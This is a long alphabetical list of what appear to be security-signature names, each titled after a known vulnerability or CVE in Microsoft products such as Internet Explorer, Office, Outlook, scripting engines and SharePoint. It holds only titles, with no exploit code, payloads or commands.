File-Text_Microsoft-Internet-Explorer-CHTML-Use-After-Free-CVE-2013-0028
File-Text_Microsoft-Internet-Explorer-Clipboard-Information-Disclosure
File-Text_Microsoft-Internet-Explorer-Cloned-Object-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Cloned-Object-Memory-Corruption-Exploit
File-Text_Microsoft-Internet-Explorer-cloneNode-Use-After-Free
File-Text_Microsoft-Internet-Explorer-Code-Execution-SA2757760
File-Text_Microsoft-Internet-Explorer-Code-Execution-SA2757760-2
File-Text_Microsoft-Internet-Explorer-Col-Element-Heap-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Com-Object-Instantiation-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Copy-And-Paste-Information-Disclosure
File-Text_Microsoft-Internet-Explorer-Cpastecommand-Use-After-Free
File-Text_Microsoft-Internet-Explorer-Createrange-Cross-Domain-Scripting
File-Text_Microsoft-Internet-Explorer-Cross-Domain-Disclosure-CVE-2010-3330
File-Text_Microsoft-Internet-Explorer-Cross-Domain-JavaScript-Injection
File-Text_Microsoft-Internet-Explorer-Cross-Frame-Scripting-Restriction-Bypass
File-Text_Microsoft-Internet-Explorer-Cross-Site-Scripting-CVE-2010-3243
File-Text_Microsoft-Internet-Explorer-Cross-Site-Scripting-CVE-2010-3324
File-Text_Microsoft-Internet-Explorer-CSS-Tag-Handling-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Cstr-Use-After-Free
File-Text_Microsoft-Internet-Explorer-Ctablecell-Information-Disclosure
File-Text_Microsoft-Internet-Explorer-Ctablecolcalc-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Ctitleelement-Use-After-Free
File-Text_Microsoft-Internet-Explorer-CTreePos-Use-After-Free
File-Text_Microsoft-Internet-Explorer-CTreePos-Use-After-Free-Vulnerability
File-Text_Microsoft-Internet-Explorer-CTxtPtr-Memory-Access-Error
File-Text_Microsoft-Internet-Explorer-CVE-2010-3971
File-Text_Microsoft-Internet-Explorer-CVE-2010-3971-2
File-Text_Microsoft-Internet-Explorer-CVE-2010-3971-3
File-Text_Microsoft-Internet-Explorer-CVE-2010-3971-4
File-Text_Microsoft-Internet-Explorer-CVE-2010-3971-5
File-Text_Microsoft-Internet-Explorer-CVE-2013-3163-Use-After-Free
File-Text_Microsoft-Internet-Explorer-CVE-2013-3184-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-CVE-2013-3203-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-CVE-2013-3205-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-CVE-2014-0274-Use-After-Free
File-Text_Microsoft-Internet-Explorer-CVE-2014-0275-Use-After-Free
File-Text_Microsoft-Internet-Explorer-CVE-2014-0282-Cinput-Use-After-Free
File-Text_Microsoft-Internet-Explorer-CVE-2014-0286-Use-After-Free
File-Text_Microsoft-Internet-Explorer-CVE-2014-0287-Use-After-Free
File-Text_Microsoft-Internet-Explorer-CVE-2014-0303-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-CVE-2014-0307-Use-After-Free
File-Text_Microsoft-Internet-Explorer-CVE-2014-0312-Use-After-Free
File-Text_Microsoft-Internet-Explorer-CVE-2014-0313-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-CVE-2014-0324-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-CVE-2014-1765-Use-After-Free
File-Text_Microsoft-Internet-Explorer-CVE-2014-1815-Use-After-Free
File-Text_Microsoft-Internet-Explorer-CVE-2014-2804-Use-After-Free
File-Text_Microsoft-Internet-Explorer-CVE-2014-6366-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-CVE-2014-8966-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-CVE-2015-0041-Use-After-Free
File-Text_Microsoft-Internet-Explorer-CVE-2015-0053-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-CVE-2015-0071-Policy-Bypass
File-Text_Microsoft-Internet-Explorer-CVE-2015-0100-Use-After-Free
File-Text_Microsoft-Internet-Explorer-CVE-2015-1667-Use-After-Free
File-Text_Microsoft-Internet-Explorer-CVE-2015-1686-Information-Disclosure
File-Text_Microsoft-Internet-Explorer-CVE-2015-1687
File-Text_Microsoft-Internet-Explorer-CVE-2015-1692-Information-Disclosure
File-Text_Microsoft-Internet-Explorer-CVE-2015-1705-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-CVE-2015-1729-Information-Disclosure
File-Text_Microsoft-Internet-Explorer-CVE-2015-1730
File-Text_Microsoft-Internet-Explorer-CVE-2015-1733-Use-After-Release
File-Text_Microsoft-Internet-Explorer-CVE-2015-1735
File-Text_Microsoft-Internet-Explorer-CVE-2015-1738-Use-After-Release
File-Text_Microsoft-Internet-Explorer-CVE-2015-1744
File-Text_Microsoft-Internet-Explorer-CVE-2015-1745-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-CVE-2015-1747-Write-What-Where
File-Text_Microsoft-Internet-Explorer-CVE-2015-1748
File-Text_Microsoft-Internet-Explorer-CVE-2015-1750
File-Text_Microsoft-Internet-Explorer-CVE-2015-1752
File-Text_Microsoft-Internet-Explorer-CVE-2015-1766
File-Text_Microsoft-Internet-Explorer-CVE-2015-2372-VBArray-Use-After-Release
File-Text_Microsoft-Internet-Explorer-CVE-2015-2383-Use-After-Release
File-Text_Microsoft-Internet-Explorer-CVE-2015-2388-Misaligned-Pointer
File-Text_Microsoft-Internet-Explorer-CVE-2015-2389-Use-After-Free
File-Text_Microsoft-Internet-Explorer-CVE-2015-2390-Use-After-Free
File-Text_Microsoft-Internet-Explorer-CVE-2015-2391-Double-Free
File-Text_Microsoft-Internet-Explorer-CVE-2015-2401-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-CVE-2015-2419-Jscript9-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-CVE-2015-2443-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-CVE-2015-2444-Use-After-Free
File-Text_Microsoft-Internet-Explorer-CVE-2015-2446-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-CVE-2015-2487-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-CVE-2015-6042-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-CVE-2015-6071-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-CVE-2015-6075-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-CVE-2015-6136-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-CVE-2016-3288-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-CVE-2016-3289
File-Text_Microsoft-Internet-Explorer-CVE-2016-3293
File-Text_Microsoft-Internet-Explorer-CVE-2016-3327
File-Text_Microsoft-Internet-Explorer-CVE-2017-0008-Information-Disclosure
File-Text_Microsoft-Internet-Explorer-CVE-2018-8631
File-Text_Microsoft-Internet-Explorer-CWigglyShape-Information-Disclosure
File-Text_Microsoft-Internet-Explorer-Datasource-Xml-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Daxctle.ocx-Spline-Method-Buffer-Overflow
File-Text_Microsoft-Internet-Explorer-Developer-Toolbar-CVE-2012-1874
File-Text_Microsoft-Internet-Explorer-Developer-Toolbar-Use-After-Free
File-Text_Microsoft-Internet-Explorer-Developer-Tools-CVE-2011-0811
File-Text_Microsoft-Internet-Explorer-DHTML-CreateControlRange-Code-Execution
File-Text_Microsoft-Internet-Explorer-DHTML-Edit-Control-Cross-Site-Scripting
File-Text_Microsoft-Internet-Explorer-DHTML-Objects-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-DOM-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-DOM-Memory-Corruption-CVE-2011-1251
File-Text_Microsoft-Internet-Explorer-DOM-Mergeattributes-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-DOM-Mergeattributes-Memory-DOS
File-Text_Microsoft-Internet-Explorer-Drag-And-Drop-CVE-2011-1254
File-Text_Microsoft-Internet-Explorer-Ebcrypt-ActiveX-Denial-of-Service
File-Text_Microsoft-Internet-Explorer-Embed-Element-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Event-Handler-Use-After-Free
File-Text_Microsoft-Internet-Explorer-Event-Listener-Use-After-Free
File-Text_Microsoft-Internet-Explorer-execCommand-File-Type-Spoofing
File-Text_Microsoft-Internet-Explorer-Filename-Buffer-Overflow
File-Text_Microsoft-Internet-Explorer-FTP-Command-Injection
File-Text_Microsoft-Internet-Explorer-Hhctrl.ocx-Image-Property-Heap-Corruption
File-Text_Microsoft-Internet-Explorer-History.go-Method-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-HTML-Attribute-Handling-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-HTML-Element-CVE-2010-3345
File-Text_Microsoft-Internet-Explorer-HTML-Embed-Tag-Stack-Buffer-Overflow
File-Text_Microsoft-Internet-Explorer-HTML-Embedded-In-Xml-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-HTML-Help-Remote-Code-Execution
File-Text_Microsoft-Internet-Explorer-HTML-Layout-CVE-2010-2560
File-Text_Microsoft-Internet-Explorer-HTML-Layout-CVE-2012-0011
File-Text_Microsoft-Internet-Explorer-HTML-Layout-Use-After-Free
File-Text_Microsoft-Internet-Explorer-HTML-Object-CVE-2010-0248
File-Text_Microsoft-Internet-Explorer-HTML-Object-CVE-2010-3340
File-Text_Microsoft-Internet-Explorer-HTML-Object-CVE-2010-3343
File-Text_Microsoft-Internet-Explorer-HTML-Objects-CVE-2009-1918
File-Text_Microsoft-Internet-Explorer-HTML-Rendering-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-HTML-Rendering-Memory-Corruption-CVE-2006-3637
File-Text_Microsoft-Internet-Explorer-HTML-Sanitization-CVE-2012-1858
File-Text_Microsoft-Internet-Explorer-HTML-Tag-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-HTML-Tag-Memory-Corruption-2
File-Text_Microsoft-Internet-Explorer-HTML-Time-Element-CVE-2010-3346
File-Text_Microsoft-Internet-Explorer-HTML-Time-Element-CVE-2010-3346-2
File-Text_Microsoft-Internet-Explorer-HTTP-Equiv-Meta-Tag-Denial-of-Service
File-Text_Microsoft-Internet-Explorer-Information-Disclosure-CVE-2015-2413
File-Text_Microsoft-Internet-Explorer-Initfromstring-Function-Out-Of-Bounds-Memory-Access
File-Text_Microsoft-Internet-Explorer-insertRow-Remote-Code-Execution
File-Text_Microsoft-Internet-Explorer-Invalid-Pointer-Reference
File-Text_Microsoft-Internet-Explorer-Invalid-Pointer-Reference-CVE-2010-0806
File-Text_Microsoft-Internet-Explorer-IsComponentInstalled-BOF
File-Text_Microsoft-Internet-Explorer-Isindex-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-JavaScript-Page-Update-Race-Condition
File-Text_Microsoft-Internet-Explorer-Jointostring-Type-Confusion
File-Text_Microsoft-Internet-Explorer-JS-Information-Disclosure-CVE-2011-1245
File-Text_Microsoft-Internet-Explorer-Jscript.dll-Regular-Expression-Use-After-Free
File-Text_Microsoft-Internet-Explorer-Jscript9.dll-Typedarray-Use-After-Free
File-Text_Microsoft-Internet-Explorer-Jserrortostring-Heap-Buffer-Overflow
File-Text_Microsoft-Internet-Explorer-Layout-Grid-Char-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Layout-Grid-Char-Memory-Corruption-2
File-Text_Microsoft-Internet-Explorer-Layout-Grid-Char-Memory-Corruption-3
File-Text_Microsoft-Internet-Explorer-Layout-Use-After-Free
File-Text_Microsoft-Internet-Explorer-Layouts-Handling-CVE-2011-0094
File-Text_Microsoft-Internet-Explorer-Layouts-Handling-CVE-2011-0094-2
File-Text_Microsoft-Internet-Explorer-Link-Properties-Handling-CVE-2011-1250
File-Text_Microsoft-Internet-Explorer-Location-Property-Cross-Domain-Scripting
File-Text_Microsoft-Internet-Explorer-Loop-Counter-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Marquee-Object-Handling-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2009-1917
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2010-0244
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3123
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3124
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3125
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3139
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3873
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3873-2
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3874
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3875
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3885
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3893
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3893-2
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3914
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3916
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3917
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-5048
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-5049
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-5049-2
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-5051
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-5052
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1762
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1766
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1785
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1789
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1791
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1795
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1800
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1802
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1804
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-2820
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-2823
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-2824
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-4050
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-4126
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-4127
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-4130
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-4140
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-8967
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-0018
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-0036
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-0046
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-1634
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2401
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2404
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2406
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2408
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2422
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2425
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2492
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-6083
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-6160
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2016-0108
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4080
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4081
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4086
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4088
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4089
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4092-1
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4092-2
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4094
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4095
File-Text_Microsoft-Internet-Explorer-MHTML-URI-Buffer-Overflow
File-Text_Microsoft-Internet-Explorer-MHTML-Url-Processing-Vulnerability
File-Text_Microsoft-Internet-Explorer-Mismatched-DOM-Objects-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Mouse-Movement-Information-Disclosure
File-Text_Microsoft-Internet-Explorer-msxml3-Concurrency-Vulnerability
File-Text_Microsoft-Internet-Explorer-Multiple-Event-Handler-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Multiple-Events-Use-After-Free
File-Text_Microsoft-Internet-Explorer-Null-Byte-CVE-2012-0012
File-Text_Microsoft-Internet-Explorer-Null-Byte-CVE-2012-1873
File-Text_Microsoft-Internet-Explorer-Null-Byte-Information-Disclosure
File-Text_Microsoft-Internet-Explorer-Object-Management-CVE-2011-1345
File-Text_Microsoft-Internet-Explorer-Object-Reference-Count-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Object-Tag-Slash-Buffer-Overflow
File-Text_Microsoft-Internet-Explorer-Objects-Handling-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-OnMove-Use-After-Free-CVE-2012-1529
File-Text_Microsoft-Internet-Explorer-Onpropertychange-Use-After-Free
File-Text_Microsoft-Internet-Explorer-onreadystatechange-CVE-2012-0170
File-Text_Microsoft-Internet-Explorer-onreadystatechange-Use-After-Free
File-Text_Microsoft-Internet-Explorer-onreadystatechange-Use-After-Free-CVE-2010-0491
File-Text_Microsoft-Internet-Explorer-onUnload-Event-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Out-Of-Bounds-Vulnerability-CVE-2018-0996
File-Text_Microsoft-Internet-Explorer-outerHTML-Information-Disclosure
File-Text_Microsoft-Internet-Explorer-Plugin-Loading-Address-Bar-Spoofing
File-Text_Microsoft-Internet-Explorer-Popup-Title-Bar-Spoofing
File-Text_Microsoft-Internet-Explorer-Print-Preview-Handling-Command-Execution
File-Text_Microsoft-Internet-Explorer-Race-Condition-CVE-2011-1257
File-Text_Microsoft-Internet-Explorer-Runtimestyle-Handling-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Same-Id-Property-Use-After-Free
File-Text_Microsoft-Internet-Explorer-Same-Origin-Policy-Bypass
File-Text_Microsoft-Internet-Explorer-Script-Engine-Stack-Exhaustion
File-Text_Microsoft-Internet-Explorer-Scripting-Engine-Vulnerability-CVE-2018-0866
File-Text_Microsoft-Internet-Explorer-Scrollintoview-Use-After-Free
File-Text_Microsoft-Internet-Explorer-SelectAll-CVE-2012-0171
File-Text_Microsoft-Internet-Explorer-Selection.empty-Use-After-Free
File-Text_Microsoft-Internet-Explorer-SetSlice-Method-Buffer-Overflow
File-Text_Microsoft-Internet-Explorer-Showhelp-Double-Colon-System-Compromise
File-Text_Microsoft-Internet-Explorer-Showhelp-Double-Slash-System-Compromise
File-Text_Microsoft-Internet-Explorer-Speech-Control-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Status-Bar-Url-Spoofing
File-Text_Microsoft-Internet-Explorer-Style-Object-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Table-Layout-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Tabular-Data-Control-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Textrange-Memory-Corruption-CVE-2015-6154
File-Text_Microsoft-Internet-Explorer-Textrange-Object-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Time-Element-CVE-2011-1255
File-Text_Microsoft-Internet-Explorer-Title-Element-Use-After-Free
File-Text_Microsoft-Internet-Explorer-toJSON-Use-After-Free
File-Text_Microsoft-Internet-Explorer-toStaticHTML-Cross-Site-Scripting
File-Text_Microsoft-Internet-Explorer-toStaticHTML-Disclosure-CVE-2011-1252
File-Text_Microsoft-Internet-Explorer-TSUserEX.DLL-ActiveX-Control-Vulnerability
File-Text_Microsoft-Internet-Explorer-Type-Confusion-Vulnerability-CVE-2018-8114
File-Text_Microsoft-Internet-Explorer-Type-Confusion-Vulnerability-CVE-2018-8122
File-Text_Microsoft-Internet-Explorer-Type-Confusion-Vulnerability-CVE-2018-8279
File-Text_Microsoft-Internet-Explorer-Type-Confusion-Vulnerability-CVE-2018-8283
File-Text_Microsoft-Internet-Explorer-Type-Confusion-Vulnerability-CVE-2018-8291
File-Text_Microsoft-Internet-Explorer-Type-Confusion-Vulnerability-CVE-2018-8298
File-Text_Microsoft-Internet-Explorer-Uninitialized-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Uninitialized-Memory-CVE-2009-2530
File-Text_Microsoft-Internet-Explorer-Uninitialized-Memory-CVE-2009-2531
File-Text_Microsoft-Internet-Explorer-Uninitialized-Memory-CVE-2010-3328
File-Text_Microsoft-Internet-Explorer-Uninitialized-Memory-CVE-2010-3328-2
File-Text_Microsoft-Internet-Explorer-Uninitialized-Object-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Uninitialized-Object-Memory-Corruption-2
File-Text_Microsoft-Internet-Explorer-URI-Redirection-Security-Bypass
File-Text_Microsoft-Internet-Explorer-Url-Validation
File-Text_Microsoft-Internet-Explorer-Urlmon.dll-Com-Object-Instantiation
File-Text_Microsoft-Internet-Explorer-US-Ascii-Most-Significant-Bit-Obfuscation
File-Text_Microsoft-Internet-Explorer-Use-After-Free-CVE-2010-0806
File-Text_Microsoft-Internet-Explorer-Use-After-Free-CVE-2010-3962
File-Text_Microsoft-Internet-Explorer-Use-After-Free-CVE-2010-3962-2
File-Text_Microsoft-Internet-Explorer-Use-After-Free-CVE-2012-0170
File-Text_Microsoft-Internet-Explorer-Use-After-Free-CVE-2014-1776
File-Text_Microsoft-Internet-Explorer-Use-After-Free-CVE-2014-1776-2
File-Text_Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-0955
File-Text_Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-0991
File-Text_Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-0994
File-Text_Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-1004
File-Text_Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-1018
File-Text_Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-8275
File-Text_Microsoft-Internet-Explorer-VBScript-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Virtual-Function-Table-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-VML-Buffer-Overrun
File-Text_Microsoft-Internet-Explorer-VML-Memory-Corruption-CVE-2011-1266
File-Text_Microsoft-Internet-Explorer-VML-Rect-Fill-Method-Buffer-Overflow
File-Text_Microsoft-Internet-Explorer-VML-Style-CVE-2012-0172
File-Text_Microsoft-Internet-Explorer-VML-Use-After-Free
File-Text_Microsoft-Internet-Explorer-WebBrowser-ActiveX-Control-Navigate-Method
File-Text_Microsoft-Internet-Explorer-XSLT-Memory-Corruption
File-Text_Microsoft-JScript-Scripting-Engine-Remote-Code-Execution
File-Text_Microsoft-Killbit-Disabled-ActiveX-Object
File-Text_Microsoft-Local-Troubleshooter-ActiveX-Control-Buffer-Overflow
File-Text_Microsoft-Management-Console-Cross-Site-Scripting
File-Text_Microsoft-Media-Center-CVE-2016-0185
File-Text_Microsoft-MSHTML-CVE-2021-40444-Remote-Code-Execution
File-Text_Microsoft-MSHTML-Platform-CVE-2021-33742-Remote-Code-Execution
File-Text_Microsoft-MsMpEng-RCE-CVE-2017-0290
File-Text_Microsoft-Multiple-Products-HTML-Sanitization-Cross-Site-Scripting
File-Text_Microsoft-Net-Framework-Remote-Code-Execution
File-Text_Microsoft-Net-Framework-Sharepoint-And-Visual-Studio-Remote-Code-Execution
File-Text_Microsoft-Office-Access-ActiveX-Memory-Corruption-CVE-2010-0814
File-Text_Microsoft-Office-Equation-Editor-Memory-Corruption
File-Text_Microsoft-Office-Excel-Fcommithtmlpivotcacheelement-Use-After-Free
File-Text_Microsoft-Office-Excel-Freephisxdb-Arbitrary-Free-CVE-2023-32029
File-Text_Microsoft-Office-Excel-Webcharts-Out-Of-Bounds-Write
File-Text_Microsoft-Office-Excel-WorksheetOptions-Use-After-Free
File-Text_Microsoft-Office-MSODataSourceControl-ActiveX-Denial-Of-Service
File-Text_Microsoft-Office-OneNote-Url-Validation-Error
File-Text_Microsoft-Office-Outlook-CVE-2018-8161-Use-After-Free
File-Text_Microsoft-Office-Outlook-Mailto-URI-Handling-Code-Execution
File-Text_Microsoft-Office-Remote-Code-Execution-CVE-2016-0012
File-Text_Microsoft-Office-Remote-Code-Execution-CVE-2024-38021
File-Text_Microsoft-Office-Spoofing-Vulnerability-CVE-2024-43609
File-Text_Microsoft-Office-URI-Scheme-Link-In-HTML
File-Text_Microsoft-Office-Web-Components-2-MS09-043
File-Text_Microsoft-Office-Web-Components-Code-Execution-CVE-2009-1136
File-Text_Microsoft-Office-Web-Components-Code-Execution-Exploit-MS09-043
File-Text_Microsoft-Office-Web-Components-Datasource-Code-Execution
File-Text_Microsoft-Office-Web-Components-MS09-043
File-Text_Microsoft-Office-Web-Components-Url-Parsing-Buffer-Overflow
File-Text_Microsoft-Outlook-Express-MHTML-Url-Processing-Vulnerability
File-Text_Microsoft-Outlook-Mail-To-RCE
File-Text_Microsoft-Outlook-OWA-URL-Redirection-CVE-2014-6336
File-Text_Microsoft-Outlook-RCE-CVE-2015-6123
File-Text_Microsoft-Outlook-Remote-Code-Execution-Monikerlink-CVE-2024-21413
File-Text_Microsoft-Outlook-Web-Access-Cross-Site-Scripting-Vulnerability
File-Text_Microsoft-Outlook-Word-Object-Tag
File-Text_Microsoft-PowerPoint-2003-Heap-Overflow
File-Text_Microsoft-Remote-Desktop-Connection-Manager-Xml-External-Entity-Injection
File-Text_Microsoft-Remote-Desktop-Protocol-ActiveX-Vulnerability-MS09-044
File-Text_Microsoft-Scripting-Engine-CVE-2016-0189-Memory-Corruption
File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0834
File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0835
File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0837
File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0838
File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0840
File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0858
File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0860
File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8229
File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8266
File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8353
File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8355
File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8371
File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8372
File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8384
File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8387
File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8389
File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8403
File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8542
File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2024-38178
File-Text_Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1001
File-Text_Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1004
File-Text_Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1062
File-Text_Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1063
File-Text_Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1092
File-Text_Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1103
File-Text_Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1104
File-Text_Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1106
File-Text_Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2019-1107
File-Text_Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2020-17052
File-Text_Microsoft-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2021-34480
File-Text_Microsoft-Scripting-Runtime-Object-Library-Use-After-Free-Vulnerability
File-Text_Microsoft-Scriptlet-ActiveX-Component-Usage
File-Text_Microsoft-Sharepoint-Remote-File-Disclosure-Vulnerability
File-Text_Microsoft-Sharepoint-Server-Remote-Code-Execution-CVE-2021-26420
File-Text_Microsoft-Sharepoint-Server-Remote-Code-Execution-CVE-2025-21400
File-Text_Microsoft-Sharepoint-Server-Remote-Code-Execution-CVE-2025-29794
